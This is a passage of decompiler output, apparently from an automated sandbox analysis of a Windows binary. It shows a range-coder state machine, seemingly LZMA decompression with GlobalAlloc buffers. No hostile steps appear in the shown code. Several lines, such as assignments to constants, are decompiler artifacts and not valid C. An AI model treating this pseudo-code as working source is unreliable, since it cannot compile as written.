                                        								L146:
                                        								if( *(_t644 - 0x6c) == 0) {
                                        									L169:
                                        									 *(_t644 - 0x88) = 0x18;
                                        									L170:
                                        									_t579 = 0x22;
                                        									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                        									_t539 = 0;
                                        									L172:
                                        									return _t539;
                                        								}
                                        								L147:
                                        								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                        								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                        								_t484 = _t644 - 0x70;
                                        								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                        								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                        								goto L148;
                                        							}
                                        							L155:
                                        							_t537 =  *(_t644 - 0x7c);
                                        							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                        							while(1) {
                                        								L140:
                                        								 *(_t644 - 0x88) = _t537;
                                        								while(1) {
                                        									L1:
                                        									_t538 =  *(_t644 - 0x88);
                                        									if(_t538 > 0x1c) {
                                        										break;
                                        									}
                                        									L2:
                                        									switch( *((intOrPtr*)(_t538 * 4 +  &M00406F09))) {
                                        										case 0:
                                        											L3:
                                        											if( *(_t644 - 0x6c) == 0) {
                                        												goto L170;
                                        											}
                                        											L4:
                                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                        											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                        											_t538 =  *( *(_t644 - 0x70));
                                        											if(_t538 > 0xe1) {
                                        												goto L171;
                                        											}
                                        											L5:
                                        											_t542 = _t538 & 0x000000ff;
                                        											_push(0x2d);
                                        											asm("cdq");
                                        											_pop(_t581);
                                        											_push(9);
                                        											_pop(_t582);
                                        											_t638 = _t542 / _t581;
                                        											_t544 = _t542 % _t581 & 0x000000ff;
                                        											asm("cdq");
                                        											_t633 = _t544 % _t582 & 0x000000ff;
                                        											 *(_t644 - 0x3c) = _t633;
                                        											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                        											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                        											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                        											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                        												L10:
                                        												if(_t641 == 0) {
                                        													L12:
                                        													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                        													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                        													goto L15;
                                        												} else {
                                        													goto L11;
                                        												}
                                        												do {
                                        													L11:
                                        													_t641 = _t641 - 1;
                                        													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                        												} while (_t641 != 0);
                                        												goto L12;
                                        											}
                                        											L6:
                                        											if( *(_t644 - 4) != 0) {
                                        												GlobalFree( *(_t644 - 4)); // executed
                                        											}
                                        											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                        											 *(_t644 - 4) = _t538;
                                        											if(_t538 == 0) {
                                        												goto L171;
                                        											} else {
                                        												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                        												goto L10;
                                        											}
                                        										case 1:
                                        											L13:
                                        											__eflags =  *(_t644 - 0x6c);
                                        											if( *(_t644 - 0x6c) == 0) {
                                        												L157:
                                        												 *(_t644 - 0x88) = 1;
                                        												goto L170;
                                        											}
                                        											L14:
                                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                        											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                        											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                        											_t45 = _t644 - 0x48;
                                        											 *_t45 =  *(_t644 - 0x48) + 1;
                                        											__eflags =  *_t45;
                                        											L15:
                                        											if( *(_t644 - 0x48) < 4) {
                                        												goto L13;
                                        											}
                                        											L16:
                                        											_t550 =  *(_t644 - 0x40);
                                        											if(_t550 ==  *(_t644 - 0x74)) {
                                        												L20:
                                        												 *(_t644 - 0x48) = 5;
                                        												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                        												goto L23;
                                        											}
                                        											L17:
                                        											 *(_t644 - 0x74) = _t550;
                                        											if( *(_t644 - 8) != 0) {
                                        												GlobalFree( *(_t644 - 8)); // executed
                                        											}
                                        											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                        											 *(_t644 - 8) = _t538;
                                        											if(_t538 == 0) {
                                        												goto L171;
                                        											} else {
                                        												goto L20;
                                        											}
                                        										case 2:
                                        											L24:
                                        											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                        											 *(_t644 - 0x84) = 6;
                                        											 *(_t644 - 0x4c) = _t557;
                                        											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                        											goto L132;
                                        										case 3:
                                        											L21:
                                        											__eflags =  *(_t644 - 0x6c);
                                        											if( *(_t644 - 0x6c) == 0) {
                                        												L158:
                                        												 *(_t644 - 0x88) = 3;
                                        												goto L170;
                                        											}
                                        											L22:
                                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                        											_t67 = _t644 - 0x70;
                                        											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                        											__eflags =  *_t67;
                                        											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                        											L23:
                                        											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                        											if( *(_t644 - 0x48) != 0) {
                                        												goto L21;
                                        											}
                                        											goto L24;
                                        										case 4:
                                        											L133:
                                        											_t559 =  *_t642;
                                        											_t626 = _t559 & 0x0000ffff;
                                        											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                        											if( *(_t644 - 0xc) >= _t596) {
                                        												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                        												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                        												 *(_t644 - 0x40) = 1;
                                        												_t560 = _t559 - (_t559 >> 5);
                                        												__eflags = _t560;
                                        												 *_t642 = _t560;
                                        											} else {
                                        												 *(_t644 - 0x10) = _t596;
                                        												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                        												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                        											}
                                        											if( *(_t644 - 0x10) >= 0x1000000) {
                                        												goto L139;
                                        											} else {
                                        												goto L137;
                                        											}
                                        										case 5:
                                        											L137:
                                        											if( *(_t644 - 0x6c) == 0) {
                                        												L168:
                                        												 *(_t644 - 0x88) = 5;
                                        												goto L170;
                                        											}
                                        											L138:
                                        											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                        											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                        											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                        											L139:
                                        											_t537 =  *(_t644 - 0x84);
                                        											L140:
                                        											 *(_t644 - 0x88) = _t537;
                                        											goto L1;
                                        										case 6:
                                        											L25:
                                        											__edx = 0;
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												L36:
                                        												__eax =  *(__ebp - 4);
                                        												__ecx =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x34) = 1;
                                        												 *(__ebp - 0x84) = 7;
                                        												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                        												goto L132;
                                        											}
                                        											L26:
                                        											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                        											__esi =  *(__ebp - 0x60);
                                        											__cl = 8;
                                        											__cl = 8 -  *(__ebp - 0x3c);
                                        											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                        											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                        											__ecx =  *(__ebp - 0x3c);
                                        											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                        											__ecx =  *(__ebp - 4);
                                        											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                        											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                        											__eflags =  *(__ebp - 0x38) - 4;
                                        											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        											if( *(__ebp - 0x38) >= 4) {
                                        												__eflags =  *(__ebp - 0x38) - 0xa;
                                        												if( *(__ebp - 0x38) >= 0xa) {
                                        													_t98 = __ebp - 0x38;
                                        													 *_t98 =  *(__ebp - 0x38) - 6;
                                        													__eflags =  *_t98;
                                        												} else {
                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                        												}
                                        											} else {
                                        												 *(__ebp - 0x38) = 0;
                                        											}
                                        											__eflags =  *(__ebp - 0x34) - __edx;
                                        											if( *(__ebp - 0x34) == __edx) {
                                        												L35:
                                        												__ebx = 0;
                                        												__ebx = 1;
                                        												goto L61;
                                        											} else {
                                        												L32:
                                        												__eax =  *(__ebp - 0x14);
                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        												__eflags = __eax -  *(__ebp - 0x74);
                                        												if(__eax >=  *(__ebp - 0x74)) {
                                        													__eax = __eax +  *(__ebp - 0x74);
                                        													__eflags = __eax;
                                        												}
                                        												__ecx =  *(__ebp - 8);
                                        												__ebx = 0;
                                        												__ebx = 1;
                                        												__al =  *((intOrPtr*)(__eax + __ecx));
                                        												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                        												goto L41;
                                        											}
                                        										case 7:
                                        											L66:
                                        											__eflags =  *(__ebp - 0x40) - 1;
                                        											if( *(__ebp - 0x40) != 1) {
                                        												L68:
                                        												__eax =  *(__ebp - 0x24);
                                        												 *(__ebp - 0x80) = 0x16;
                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                        												__eax =  *(__ebp - 0x28);
                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                        												__eax =  *(__ebp - 0x2c);
                                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                        												__eax = 0;
                                        												__eflags =  *(__ebp - 0x38) - 7;
                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        												__al = __al & 0x000000fd;
                                        												__eax = (__eflags >= 0) - 1 + 0xa;
                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                        												__eax =  *(__ebp - 4);
                                        												__eax =  *(__ebp - 4) + 0x664;
                                        												__eflags = __eax;
                                        												 *(__ebp - 0x58) = __eax;
                                        												goto L69;
                                        											}
                                        											L67:
                                        											__eax =  *(__ebp - 4);
                                        											__ecx =  *(__ebp - 0x38);
                                        											 *(__ebp - 0x84) = 8;
                                        											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                        											goto L132;
                                        										case 8:
                                        											L70:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												__eax =  *(__ebp - 4);
                                        												__ecx =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x84) = 0xa;
                                        												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                        											} else {
                                        												__eax =  *(__ebp - 0x38);
                                        												__ecx =  *(__ebp - 4);
                                        												__eax =  *(__ebp - 0x38) + 0xf;
                                        												 *(__ebp - 0x84) = 9;
                                        												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                        												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                        											}
                                        											goto L132;
                                        										case 9:
                                        											L73:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												goto L90;
                                        											}
                                        											L74:
                                        											__eflags =  *(__ebp - 0x60);
                                        											if( *(__ebp - 0x60) == 0) {
                                        												goto L171;
                                        											}
                                        											L75:
                                        											__eax = 0;
                                        											__eflags =  *(__ebp - 0x38) - 7;
                                        											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                        											__eflags = _t259;
                                        											0 | _t259 = _t259 + _t259 + 9;
                                        											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                        											goto L76;
                                        										case 0xa:
                                        											L82:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												L84:
                                        												__eax =  *(__ebp - 4);
                                        												__ecx =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x84) = 0xb;
                                        												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                        												goto L132;
                                        											}
                                        											L83:
                                        											__eax =  *(__ebp - 0x28);
                                        											goto L89;
                                        										case 0xb:
                                        											L85:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												__ecx =  *(__ebp - 0x24);
                                        												__eax =  *(__ebp - 0x20);
                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                        											} else {
                                        												__eax =  *(__ebp - 0x24);
                                        											}
                                        											__ecx =  *(__ebp - 0x28);
                                        											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                        											L89:
                                        											__ecx =  *(__ebp - 0x2c);
                                        											 *(__ebp - 0x2c) = __eax;
                                        											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                        											L90:
                                        											__eax =  *(__ebp - 4);
                                        											 *(__ebp - 0x80) = 0x15;
                                        											__eax =  *(__ebp - 4) + 0xa68;
                                        											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                        											goto L69;
                                        										case 0xc:
                                        											L99:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												L164:
                                        												 *(__ebp - 0x88) = 0xc;
                                        												goto L170;
                                        											}
                                        											L100:
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t334 = __ebp - 0x70;
                                        											 *_t334 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t334;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											__eax =  *(__ebp - 0x2c);
                                        											goto L101;
                                        										case 0xd:
                                        											L37:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												L159:
                                        												 *(__ebp - 0x88) = 0xd;
                                        												goto L170;
                                        											}
                                        											L38:
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t122 = __ebp - 0x70;
                                        											 *_t122 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t122;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											L39:
                                        											__eax =  *(__ebp - 0x40);
                                        											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                        												goto L48;
                                        											}
                                        											L40:
                                        											__eflags = __ebx - 0x100;
                                        											if(__ebx >= 0x100) {
                                        												goto L54;
                                        											}
                                        											L41:
                                        											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                        											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                        											__ecx =  *(__ebp - 0x58);
                                        											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                        											 *(__ebp - 0x48) = __eax;
                                        											__eax = __eax + 1;
                                        											__eax = __eax << 8;
                                        											__eax = __eax + __ebx;
                                        											__esi =  *(__ebp - 0x58) + __eax * 2;
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        											__ax =  *__esi;
                                        											 *(__ebp - 0x54) = __esi;
                                        											__edx = __ax & 0x0000ffff;
                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                        											if( *(__ebp - 0xc) >= __ecx) {
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        												__cx = __ax;
                                        												 *(__ebp - 0x40) = 1;
                                        												__cx = __ax >> 5;
                                        												__eflags = __eax;
                                        												__ebx = __ebx + __ebx + 1;
                                        												 *__esi = __ax;
                                        											} else {
                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                        												 *(__ebp - 0x10) = __ecx;
                                        												0x800 = 0x800 - __edx;
                                        												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                        												__ebx = __ebx + __ebx;
                                        												 *__esi = __cx;
                                        											}
                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        											 *(__ebp - 0x44) = __ebx;
                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                        												goto L39;
                                        											} else {
                                        												L45:
                                        												goto L37;
                                        											}
                                        										case 0xe:
                                        											L46:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												L160:
                                        												 *(__ebp - 0x88) = 0xe;
                                        												goto L170;
                                        											}
                                        											L47:
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t156 = __ebp - 0x70;
                                        											 *_t156 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t156;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											while(1) {
                                        												L48:
                                        												__eflags = __ebx - 0x100;
                                        												if(__ebx >= 0x100) {
                                        													break;
                                        												}
                                        												L49:
                                        												__eax =  *(__ebp - 0x58);
                                        												__edx = __ebx + __ebx;
                                        												__ecx =  *(__ebp - 0x10);
                                        												__esi = __edx + __eax;
                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                        												__ax =  *__esi;
                                        												 *(__ebp - 0x54) = __esi;
                                        												__edi = __ax & 0x0000ffff;
                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                        												if( *(__ebp - 0xc) >= __ecx) {
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        													__cx = __ax;
                                        													_t170 = __edx + 1; // 0x1
                                        													__ebx = _t170;
                                        													__cx = __ax >> 5;
                                        													__eflags = __eax;
                                        													 *__esi = __ax;
                                        												} else {
                                        													 *(__ebp - 0x10) = __ecx;
                                        													0x800 = 0x800 - __edi;
                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        													__ebx = __ebx + __ebx;
                                        													 *__esi = __cx;
                                        												}
                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        												 *(__ebp - 0x44) = __ebx;
                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                        													continue;
                                        												} else {
                                        													L53:
                                        													goto L46;
                                        												}
                                        											}
                                        											L54:
                                        											_t173 = __ebp - 0x34;
                                        											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                        											__eflags =  *_t173;
                                        											goto L55;
                                        										case 0xf:
                                        											L58:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												L161:
                                        												 *(__ebp - 0x88) = 0xf;
                                        												goto L170;
                                        											}
                                        											L59:
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t203 = __ebp - 0x70;
                                        											 *_t203 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t203;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											L60:
                                        											__eflags = __ebx - 0x100;
                                        											if(__ebx >= 0x100) {
                                        												L55:
                                        												__al =  *(__ebp - 0x44);
                                        												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                        												goto L56;
                                        											}
                                        											L61:
                                        											__eax =  *(__ebp - 0x58);
                                        											__edx = __ebx + __ebx;
                                        											__ecx =  *(__ebp - 0x10);
                                        											__esi = __edx + __eax;
                                        											__ecx =  *(__ebp - 0x10) >> 0xb;
                                        											__ax =  *__esi;
                                        											 *(__ebp - 0x54) = __esi;
                                        											__edi = __ax & 0x0000ffff;
                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                        											if( *(__ebp - 0xc) >= __ecx) {
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        												__cx = __ax;
                                        												_t217 = __edx + 1; // 0x1
                                        												__ebx = _t217;
                                        												__cx = __ax >> 5;
                                        												__eflags = __eax;
                                        												 *__esi = __ax;
                                        											} else {
                                        												 *(__ebp - 0x10) = __ecx;
                                        												0x800 = 0x800 - __edi;
                                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        												__ebx = __ebx + __ebx;
                                        												 *__esi = __cx;
                                        											}
                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        											 *(__ebp - 0x44) = __ebx;
                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                        												goto L60;
                                        											} else {
                                        												L65:
                                        												goto L58;
                                        											}
                                        										case 0x10:
                                        											L109:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												L165:
                                        												 *(__ebp - 0x88) = 0x10;
                                        												goto L170;
                                        											}
                                        											L110:
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t365 = __ebp - 0x70;
                                        											 *_t365 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t365;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											goto L111;
                                        										case 0x11:
                                        											L69:
                                        											__esi =  *(__ebp - 0x58);
                                        											 *(__ebp - 0x84) = 0x12;
                                        											goto L132;
                                        										case 0x12:
                                        											L128:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												L131:
                                        												__eax =  *(__ebp - 0x58);
                                        												 *(__ebp - 0x84) = 0x13;
                                        												__esi =  *(__ebp - 0x58) + 2;
                                        												L132:
                                        												 *(_t644 - 0x54) = _t642;
                                        												goto L133;
                                        											}
                                        											L129:
                                        											__eax =  *(__ebp - 0x4c);
                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                        											__ecx =  *(__ebp - 0x58);
                                        											__eax =  *(__ebp - 0x4c) << 4;
                                        											__eflags = __eax;
                                        											__eax =  *(__ebp - 0x58) + __eax + 4;
                                        											goto L130;
                                        										case 0x13:
                                        											L141:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												L143:
                                        												_t469 = __ebp - 0x58;
                                        												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                        												__eflags =  *_t469;
                                        												 *(__ebp - 0x30) = 0x10;
                                        												 *(__ebp - 0x40) = 8;
                                        												L144:
                                        												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                        												L145:
                                        												 *(_t644 - 0x50) = 1;
                                        												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                        												goto L149;
                                        											}
                                        											L142:
                                        											__eax =  *(__ebp - 0x4c);
                                        											__ecx =  *(__ebp - 0x58);
                                        											__eax =  *(__ebp - 0x4c) << 4;
                                        											 *(__ebp - 0x30) = 8;
                                        											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                        											L130:
                                        											 *(__ebp - 0x58) = __eax;
                                        											 *(__ebp - 0x40) = 3;
                                        											goto L144;
                                        										case 0x14:
                                        											L156:
                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                        											__eax =  *(__ebp - 0x80);
                                        											while(1) {
                                        												L140:
                                        												 *(_t644 - 0x88) = _t537;
                                        												goto L1;
                                        											}
                                        										case 0x15:
                                        											L91:
                                        											__eax = 0;
                                        											__eflags =  *(__ebp - 0x38) - 7;
                                        											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        											__al = __al & 0x000000fd;
                                        											__eax = (__eflags >= 0) - 1 + 0xb;
                                        											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                        											goto L120;
                                        										case 0x16:
                                        											goto L0;
                                        										case 0x17:
                                        											while(1) {
                                        												L145:
                                        												 *(_t644 - 0x50) = 1;
                                        												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                        												goto L149;
                                        											}
                                        										case 0x18:
                                        											goto L146;
                                        										case 0x19:
                                        											L94:
                                        											__eflags = __ebx - 4;
                                        											if(__ebx < 4) {
                                        												L98:
                                        												 *(__ebp - 0x2c) = __ebx;
                                        												L119:
                                        												_t393 = __ebp - 0x2c;
                                        												 *_t393 =  *(__ebp - 0x2c) + 1;
                                        												__eflags =  *_t393;
                                        												L120:
                                        												__eax =  *(__ebp - 0x2c);
                                        												__eflags = __eax;
                                        												if(__eax == 0) {
                                        													L166:
                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                        													goto L170;
                                        												}
                                        												L121:
                                        												__eflags = __eax -  *(__ebp - 0x60);
                                        												if(__eax >  *(__ebp - 0x60)) {
                                        													goto L171;
                                        												}
                                        												L122:
                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                        												__eax =  *(__ebp - 0x30);
                                        												_t400 = __ebp - 0x60;
                                        												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                        												__eflags =  *_t400;
                                        												goto L123;
                                        											}
                                        											L95:
                                        											__ecx = __ebx;
                                        											__eax = __ebx;
                                        											__ecx = __ebx >> 1;
                                        											__eax = __ebx & 0x00000001;
                                        											__ecx = (__ebx >> 1) - 1;
                                        											__al = __al | 0x00000002;
                                        											__eax = (__ebx & 0x00000001) << __cl;
                                        											__eflags = __ebx - 0xe;
